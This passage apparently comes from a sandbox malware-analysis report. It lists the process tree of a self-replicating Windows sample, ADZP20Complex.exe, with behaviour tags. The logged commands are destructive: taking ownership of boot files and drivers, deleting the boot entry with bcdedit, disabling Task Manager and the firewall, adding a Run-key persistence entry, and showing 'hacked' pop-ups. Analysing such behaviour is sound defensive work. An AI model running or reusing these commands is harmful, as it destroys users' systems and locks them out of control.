    PID:1248
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:888
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1804
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:536
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2400
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2204
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2216
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3044
- - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2364
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C38D.tmp\C38E.tmp\C38F.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
      4⤵
      Drops startup file
      PID:2276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:948
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:584
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:1520
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:300
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2164
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1324
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1704
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:2800
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:2864
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2196
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2732
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2868
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:1032
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:1556
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        
        PID:2524
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1380
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1724
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2820
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2200
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1644
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2564
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2476
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1264
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2604
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E234.tmp\E235.tmp\E236.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5112
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:6532
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:3748
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:3476
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4532
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:4820
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:3836
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4008
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4828
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4284
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4632
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4708
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4304
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5516
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6608
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6816
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:7108
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6200
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6732
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6636
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6824
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6804
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6788
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6896
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6820
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7012
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:6184
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:5724
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:3312
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:5316
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7000
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7048
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6452
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:6644
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7340
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7396
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7492
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7576
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7616
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7640
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8580
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10136
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11424
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12668
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:13092
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1916
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2796
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2800
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2236
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2860
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E292.tmp\E293.tmp\E294.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4204
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6572
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:3296
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4576
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4548
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:5036
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:1608
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4624
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4924
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4580
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4624
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3920
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4240
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5828
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6668
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6748
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7164
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6380
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6904
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7056
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7028
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7036
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6852
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6932
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6580
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6828
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6588
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7200
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7348
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7416
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7524
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7588
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7624
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7648
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7692
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7720
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7744
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7760
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7792
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7832
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7864
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7896
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:7916
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8912
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        
        PID:10572
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2704
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12404
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:9652
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:2864
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2228
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2852
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:576
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2100
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E6B7.tmp\E6B8.tmp\E6B9.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:3160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4760
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6704
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4844
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:5068
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3480
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4184
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:3868
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4604
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3808
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:1608
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:5008
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4628
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4932
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5228
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6784
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6932
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5932
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5516
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7132
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5920
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7100
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6164
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4932
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5228
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6928
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7172
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7232
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7372
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7424
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7544
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7600
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7632
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7664
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7700
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7728
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7752
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7768
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:7808
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7844
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7880
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7904
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7928
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7948
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8948
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10632
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:3068
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13296
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:9944
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:1092
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2000
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:1124
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:2064
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2640
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:2760
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3476
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        
        PID:3888
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:1916
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4236
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4684
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4816
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4908
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4224
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4492
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        
        PID:4668
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        Views/modifies file attributes
        
        PID:4576
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4608
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4548
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4188
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4308
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4896
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:4492
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:4316
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4A1A.tmp\4A1B.tmp\4A2C.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:7780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:1232
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:7804
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:8804
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:8992
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
